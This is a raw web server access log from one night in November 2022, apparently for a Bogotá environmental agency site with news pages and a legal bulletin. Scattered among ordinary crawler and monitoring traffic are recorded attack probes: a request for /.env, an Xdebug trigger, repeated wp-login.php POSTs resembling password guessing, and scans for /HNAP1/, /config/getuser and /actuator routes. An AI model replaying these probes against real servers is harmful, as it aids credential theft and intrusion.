201.245.192.253 - - [14/Nov/2022:00:48:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Nov/2022:00:49:02 -0500] "HEAD / HTTP/1.1" 200 -
199.16.157.180 - - [14/Nov/2022:00:52:33 -0500] "GET /calidad-del-aire-de-bogota-vuelve-a-verse-afectada-por-altas-concentraciones-de-material-particulado.html HTTP/1.1" 200 1152
199.16.157.183 - - [14/Nov/2022:00:52:34 -0500] "GET /images/feria-17-de-septiembre_optimized.jpg HTTP/1.1" 200 40532
199.16.157.181 - - [14/Nov/2022:00:52:34 -0500] "GET /atencion-mujeres-que-reverdecen-ya-inicia-la-segunda-fase.html HTTP/1.1" 200 857
199.16.157.182 - - [14/Nov/2022:00:52:34 -0500] "GET /images/secretaria-carolina-urrutia_optimized.jpeg HTTP/1.1" 200 167197
199.16.157.181 - - [14/Nov/2022:00:52:34 -0500] "GET /images/Mujeres%20que%20reverdecen%201%20sept.jpeg HTTP/1.1" 200 134076
172.22.2.4 - - [14/Nov/2022:00:51:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Nov/2022:00:53:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Nov/2022:00:52:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60277
216.245.221.92 - - [14/Nov/2022:00:54:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Nov/2022:00:58:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Nov/2022:00:57:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/Nov/2022:00:59:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:00:58:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59779
152.89.196.211 - - [14/Nov/2022:01:00:46 -0500] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 319
185.119.81.106 - - [14/Nov/2022:01:01:04 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.106 - - [14/Nov/2022:01:01:05 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
201.245.192.253 - - [14/Nov/2022:01:03:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Nov/2022:01:04:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:01:03:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:01:03:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59035
128.14.133.58 - - [14/Nov/2022:01:06:41 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [14/Nov/2022:01:08:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Nov/2022:01:09:02 -0500] "HEAD / HTTP/1.1" 200 -
92.118.39.78 - - [14/Nov/2022:01:10:29 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [14/Nov/2022:01:08:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:01:09:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55272
201.245.192.253 - - [14/Nov/2022:01:13:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
157.55.39.206 - - [14/Nov/2022:01:13:46 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2018%2F HTTP/1.1" 200 271776
40.77.167.10 - - [14/Nov/2022:01:13:51 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 248131
157.55.39.39 - - [14/Nov/2022:01:13:56 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
216.245.221.92 - - [14/Nov/2022:01:14:02 -0500] "HEAD / HTTP/1.1" 200 -
152.61.192.232 - - [14/Nov/2022:01:14:59 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [14/Nov/2022:01:14:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:01:15:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58612
201.245.192.253 - - [14/Nov/2022:01:18:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Nov/2022:01:19:02 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.106 - - [14/Nov/2022:01:19:07 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.106 - - [14/Nov/2022:01:19:07 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
152.61.128.50 - - [14/Nov/2022:01:19:58 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [14/Nov/2022:01:21:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43964
201.245.192.253 - - [14/Nov/2022:01:21:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43303
172.22.2.4 - - [14/Nov/2022:01:20:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:01:21:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59779
201.245.192.253 - - [14/Nov/2022:01:23:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
173.252.79.23 - - [14/Nov/2022:01:23:25 -0500] "GET /images/prendas-1_optimized.jpeg HTTP/1.1" 200 65869
216.245.221.92 - - [14/Nov/2022:01:24:02 -0500] "HEAD / HTTP/1.1" 200 -
36.37.140.96 - - [14/Nov/2022:01:24:59 -0500] "GET /.env HTTP/1.1" 404 1018
36.37.140.96 - - [14/Nov/2022:01:25:06 -0500] "POST / HTTP/1.1" 200 319
217.182.175.162 - - [14/Nov/2022:01:26:36 -0500] "HEAD /alcaldesa-mayor-lidera-puesto-de-mando-unificado-para-atender-emergencia-invernal-en-inmediaciones-de-la-calera.html HTTP/1.1" 200 -
51.15.164.30 - - [14/Nov/2022:01:26:36 -0500] "HEAD /alcaldesa-mayor-lidera-puesto-de-mando-unificado-para-atender-emergencia-invernal-en-inmediaciones-de-la-calera.html HTTP/1.1" 200 -
173.252.79.1 - - [14/Nov/2022:01:27:42 -0500] "GET /images/mercados-campesinos-5-mayo.jpg HTTP/1.1" 200 95848
172.22.2.4 - - [14/Nov/2022:01:26:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Nov/2022:01:28:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Nov/2022:01:27:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 48283
216.245.221.92 - - [14/Nov/2022:01:29:02 -0500] "HEAD / HTTP/1.1" 200 -
20.231.101.203 - - [14/Nov/2022:01:28:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56825
201.245.192.253 - - [14/Nov/2022:01:31:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43964
201.245.192.253 - - [14/Nov/2022:01:31:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43303
201.245.192.253 - - [14/Nov/2022:01:33:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
185.119.81.106 - - [14/Nov/2022:01:33:49 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.106 - - [14/Nov/2022:01:33:50 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [14/Nov/2022:01:32:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/Nov/2022:01:34:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:01:33:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
201.245.192.253 - - [14/Nov/2022:01:38:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [14/Nov/2022:01:39:02 -0500] "HEAD / HTTP/1.1" 200 -
3.85.189.229 - - [14/Nov/2022:01:39:22 -0500] "GET /secretaria-de-ambiente-acompano-los-dialogos-regionales-vinculantes-para-san-cristobal-y-rafael-uribe-uribe.html HTTP/1.1" 200 984
3.85.189.229 - - [14/Nov/2022:01:39:22 -0500] "GET /secretaria-de-ambiente-acompano-los-dialogos-regionales-vinculantes-para-san-cristobal-y-rafael-uribe-uribe.html HTTP/1.1" 200 984
172.22.2.4 - - [14/Nov/2022:01:38:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:01:38:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59779
201.245.192.253 - - [14/Nov/2022:01:41:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43964
201.245.192.253 - - [14/Nov/2022:01:41:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43303
172.22.2.4 - - [14/Nov/2022:01:42:50 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
172.22.2.4 - - [14/Nov/2022:01:42:50 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [14/Nov/2022:01:43:05 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=3071&usuario=&sector=&fecha=2019&resuelve= HTTP/1.1" 200 1102
190.253.168.233 - - [14/Nov/2022:01:43:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3071.pdf HTTP/1.1" 200 447525
190.253.168.233 - - [14/Nov/2022:01:43:08 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [14/Nov/2022:01:43:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Nov/2022:01:44:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:01:43:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:01:44:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59779
27.47.41.57 - - [14/Nov/2022:01:46:38 -0500] "POST /HNAP1/ HTTP/1.0" 400 945
201.245.192.253 - - [14/Nov/2022:01:48:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
194.146.24.107 - - [14/Nov/2022:01:48:29 -0500] "GET /config/getuser?index=0 HTTP/1.1" 404 1018
172.22.2.4 - - [14/Nov/2022:01:48:31 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=PEV&fecha=2020&resuelve= HTTP/1.1" 200 287541
172.22.2.4 - - [14/Nov/2022:01:48:39 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=COMPETENCIA&fecha=2020&resuelve= HTTP/1.1" 200 51676
216.245.221.92 - - [14/Nov/2022:01:49:02 -0500] "HEAD / HTTP/1.1" 200 -
190.253.168.233 - - [14/Nov/2022:01:49:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/1395.pdf HTTP/1.1" 200 339653
152.89.196.211 - - [14/Nov/2022:01:50:17 -0500] "-" 408 -
172.22.2.4 - - [14/Nov/2022:01:49:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
167.94.146.60 - - [14/Nov/2022:01:51:56 -0500] "GET / HTTP/1.1" 200 319
167.94.146.60 - - [14/Nov/2022:01:51:56 -0500] "GET / HTTP/1.1" 200 319
167.94.146.60 - - [14/Nov/2022:01:51:56 -0500] "PRI * HTTP/2.0" 400 946
167.94.146.60 - - [14/Nov/2022:01:51:57 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
185.119.81.103 - - [14/Nov/2022:01:52:01 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [14/Nov/2022:01:52:02 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
172.22.2.4 - - [14/Nov/2022:01:50:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59779
201.245.192.253 - - [14/Nov/2022:01:53:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Nov/2022:01:54:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:01:54:19 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=COMPETENCIA&fecha=2021&resuelve= HTTP/1.1" 200 79225
190.253.168.233 - - [14/Nov/2022:01:54:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0023.pdf HTTP/1.1" 200 340897
172.22.2.4 - - [14/Nov/2022:01:56:09 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=COMPETENCIA&fecha=2020&resuelve= HTTP/1.1" 200 51676
190.253.168.233 - - [14/Nov/2022:01:56:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/1069.pdf HTTP/1.1" 200 444625
185.119.81.103 - - [14/Nov/2022:01:56:33 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [14/Nov/2022:01:56:34 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [14/Nov/2022:01:55:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
152.61.192.232 - - [14/Nov/2022:01:57:17 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [14/Nov/2022:01:57:19 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [14/Nov/2022:01:57:19 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
172.22.2.4 - - [14/Nov/2022:01:56:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56079
201.245.192.253 - - [14/Nov/2022:01:58:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Nov/2022:01:58:24 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%208%20del%2021%20de%20Agosto%20de%202012.pdf HTTP/1.1" 304 -
216.245.221.92 - - [14/Nov/2022:01:59:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:02:01:45 -0500] "GET /BLA/boletinlegal/Circulares/2015/Circular%20No.%202%20del%201%20de%20julio%20de%202015.pdf HTTP/1.1" 304 -
172.22.2.4 - - [14/Nov/2022:02:01:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
191.96.150.245 - - [14/Nov/2022:02:03:11 -0500] "GET /wp-login.php HTTP/1.1" 404 1018
201.245.192.253 - - [14/Nov/2022:02:03:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Nov/2022:02:02:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56079
216.245.221.92 - - [14/Nov/2022:02:04:02 -0500] "HEAD / HTTP/1.1" 200 -
54.39.177.173 - - [14/Nov/2022:02:05:09 -0500] "-" 408 -
3.85.189.229 - - [14/Nov/2022:02:05:50 -0500] "GET /secretaria-de-ambiente-acompano-los-dialogos-regionales-vinculantes-para-san-cristobal-y-rafael-uribe-uribe.html HTTP/1.1" 200 984
3.85.189.229 - - [14/Nov/2022:02:05:50 -0500] "GET /secretaria-de-ambiente-acompano-los-dialogos-regionales-vinculantes-para-san-cristobal-y-rafael-uribe-uribe.html HTTP/1.1" 200 984
152.61.128.50 - - [14/Nov/2022:02:06:19 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [14/Nov/2022:02:06:20 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [14/Nov/2022:02:06:20 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
201.245.192.253 - - [14/Nov/2022:02:08:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Nov/2022:02:07:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/Nov/2022:02:09:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:02:08:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59779
95.217.144.236 - - [14/Nov/2022:02:10:33 -0500] "-" 408 -
95.217.144.238 - - [14/Nov/2022:02:10:40 -0500] "-" 408 -
95.217.144.238 - - [14/Nov/2022:02:11:12 -0500] "-" 408 -
95.217.144.238 - - [14/Nov/2022:02:11:12 -0500] "-" 408 -
95.217.144.236 - - [14/Nov/2022:02:11:22 -0500] "-" 408 -
95.217.144.234 - - [14/Nov/2022:02:11:25 -0500] "-" 408 -
95.217.144.236 - - [14/Nov/2022:02:11:25 -0500] "-" 408 -
95.217.144.234 - - [14/Nov/2022:02:11:27 -0500] "-" 408 -
95.217.144.236 - - [14/Nov/2022:02:11:32 -0500] "-" 408 -
95.217.144.236 - - [14/Nov/2022:02:11:32 -0500] "-" 408 -
95.217.145.45 - - [14/Nov/2022:02:11:38 -0500] "-" 408 -
95.217.145.45 - - [14/Nov/2022:02:11:38 -0500] "-" 408 -
95.217.144.238 - - [14/Nov/2022:02:11:44 -0500] "-" 408 -
95.217.144.238 - - [14/Nov/2022:02:11:44 -0500] "-" 408 -
95.217.144.238 - - [14/Nov/2022:02:11:44 -0500] "-" 408 -
95.217.144.234 - - [14/Nov/2022:02:11:46 -0500] "-" 408 -
95.217.144.234 - - [14/Nov/2022:02:11:46 -0500] "-" 408 -
95.217.144.234 - - [14/Nov/2022:02:11:46 -0500] "-" 408 -
95.217.144.238 - - [14/Nov/2022:02:11:49 -0500] "-" 408 -
201.245.192.253 - - [14/Nov/2022:02:13:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
64.62.197.101 - - [14/Nov/2022:02:13:42 -0500] "GET / HTTP/1.1" 200 319
40.77.167.46 - - [14/Nov/2022:02:14:00 -0500] "GET /bla/resoluciones/index.php?dir=resoluciones+2005/res+2005++1601-1650 HTTP/1.1" 200 12426
216.245.221.92 - - [14/Nov/2022:02:14:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:02:12:59 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 49550
172.22.2.4 - - [14/Nov/2022:02:13:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:02:15:24 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1140
172.22.2.4 - - [14/Nov/2022:02:13:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54100
64.62.197.95 - - [14/Nov/2022:02:16:34 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [14/Nov/2022:02:18:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Nov/2022:02:19:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:02:18:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:02:19:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
201.245.192.253 - - [14/Nov/2022:02:21:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43353
201.245.192.253 - - [14/Nov/2022:02:21:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43461
173.252.127.7 - - [14/Nov/2022:02:21:52 -0500] "GET /images/Reciclaton%20Nov%202022%20(1)%20(1).jpeg HTTP/1.1" 200 53811
201.245.192.253 - - [14/Nov/2022:02:23:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Nov/2022:02:24:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:02:24:14 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/G__Jurisp.%20Junio%202014_Sent%20Tutela%20Drumond.docx HTTP/1.1" 200 25380
94.102.61.10 - - [14/Nov/2022:02:25:27 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
172.22.2.4 - - [14/Nov/2022:02:25:36 -0500] "POST /BLA/boletinlegal/t5 HTTP/1.1" 404 1018
172.22.2.4 - - [14/Nov/2022:02:24:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
74.82.47.24 - - [14/Nov/2022:02:27:09 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [14/Nov/2022:02:25:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58185
93.158.161.72 - - [14/Nov/2022:02:27:27 -0500] "-" 408 -
77.88.5.232 - - [14/Nov/2022:02:27:32 -0500] "-" 408 -
93.158.161.29 - - [14/Nov/2022:02:27:37 -0500] "-" 408 -
77.88.5.27 - - [14/Nov/2022:02:27:43 -0500] "-" 408 -
152.89.196.211 - - [14/Nov/2022:02:27:46 -0500] "GET /actuator/gateway/routes HTTP/1.1" 404 1018
77.88.5.249 - - [14/Nov/2022:02:27:58 -0500] "-" 408 -
201.245.192.253 - - [14/Nov/2022:02:28:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
77.88.5.49 - - [14/Nov/2022:02:28:13 -0500] "-" 408 -
77.88.5.82 - - [14/Nov/2022:02:28:43 -0500] "-" 408 -
216.245.221.92 - - [14/Nov/2022:02:29:02 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.5 - - [14/Nov/2022:02:29:43 -0500] "-" 408 -
93.158.161.50 - - [14/Nov/2022:02:30:43 -0500] "-" 408 -
201.245.192.253 - - [14/Nov/2022:02:31:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43353
201.245.192.253 - - [14/Nov/2022:02:31:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43461
20.231.101.203 - - [14/Nov/2022:02:29:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58185
172.22.2.4 - - [14/Nov/2022:02:30:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
199.16.157.180 - - [14/Nov/2022:02:32:29 -0500] "-" 408 -
199.16.157.183 - - [14/Nov/2022:02:32:29 -0500] "-" 408 -
199.16.157.181 - - [14/Nov/2022:02:32:30 -0500] "-" 408 -
172.22.2.4 - - [14/Nov/2022:02:31:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53337
201.245.192.253 - - [14/Nov/2022:02:33:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
77.88.5.214 - - [14/Nov/2022:02:33:42 -0500] "-" 408 -
216.245.221.92 - - [14/Nov/2022:02:34:02 -0500] "HEAD / HTTP/1.1" 200 -
190.157.248.100 - - [14/Nov/2022:02:35:11 -0500] "GET / HTTP/1.1" 200 4720
194.146.24.107 - - [14/Nov/2022:02:35:32 -0500] "GET /config/getuser?index=0 HTTP/1.1" 404 1018
77.88.5.162 - - [14/Nov/2022:02:36:42 -0500] "-" 408 -
172.22.2.4 - - [14/Nov/2022:02:36:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Nov/2022:02:38:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Nov/2022:02:37:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59779
216.245.221.92 - - [14/Nov/2022:02:39:02 -0500] "HEAD / HTTP/1.1" 200 -
185.224.128.201 - - [14/Nov/2022:02:39:28 -0500] "GET /admin/assets/js/views/login.js HTTP/1.0" 404 1018
201.245.192.253 - - [14/Nov/2022:02:41:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43353
201.245.192.253 - - [14/Nov/2022:02:41:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43461
77.88.5.10 - - [14/Nov/2022:02:41:42 -0500] "-" 408 -
40.77.167.46 - - [14/Nov/2022:02:41:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5309.pdf HTTP/1.1" 304 -
201.245.192.253 - - [14/Nov/2022:02:43:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Nov/2022:02:42:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/Nov/2022:02:44:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:02:43:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
201.245.192.253 - - [14/Nov/2022:02:48:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
185.119.81.98 - - [14/Nov/2022:02:48:26 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.98 - - [14/Nov/2022:02:48:27 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [14/Nov/2022:02:49:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:02:48:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:02:48:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55680
54.198.228.64 - - [14/Nov/2022:02:51:09 -0500] "GET /secretaria-de-ambiente-acompano-los-dialogos-regionales-vinculantes-para-san-cristobal-y-rafael-uribe-uribe.html HTTP/1.1" 200 984
54.198.228.64 - - [14/Nov/2022:02:51:10 -0500] "GET /secretaria-de-ambiente-acompano-los-dialogos-regionales-vinculantes-para-san-cristobal-y-rafael-uribe-uribe.html HTTP/1.1" 200 984
201.245.192.253 - - [14/Nov/2022:02:53:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
196.216.95.194 - - [14/Nov/2022:02:53:09 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [14/Nov/2022:02:53:23 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1037
172.22.2.4 - - [14/Nov/2022:02:53:23 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1037
172.22.2.4 - - [14/Nov/2022:02:53:28 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%206%20del%2029%20de%20Julio%20de%202011.pdf HTTP/1.1" 304 -
114.119.137.3 - - [14/Nov/2022:02:53:29 -0500] "-" 408 -
216.245.221.92 - - [14/Nov/2022:02:54:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:02:53:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:02:54:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
77.88.5.221 - - [14/Nov/2022:02:57:39 -0500] "-" 408 -
201.245.192.253 - - [14/Nov/2022:02:58:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Nov/2022:02:59:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:03:00:33 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [14/Nov/2022:03:00:36 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2006%20del%2016%20de%20Agosto%20de%202017.pdf HTTP/1.1" 200 310598
172.22.2.4 - - [14/Nov/2022:02:59:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:03:00:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59779
130.211.96.77 - - [14/Nov/2022:03:02:46 -0500] "GET /distrito-entrego-certificado-de-reconocimiento-a-mas-de-600-mujeres-que-reverdecen-tras-seis-meses-de-formacion-teorica-y-practica.html HTTP/1.1" 200 1113
201.245.192.253 - - [14/Nov/2022:03:03:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Nov/2022:03:03:27 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1547&usuario=&sector=PEV&fecha=2018&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [14/Nov/2022:03:03:29 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1547&usuario=&sector=PEV&fecha=2018&resuelve= HTTP/1.1" 200 626
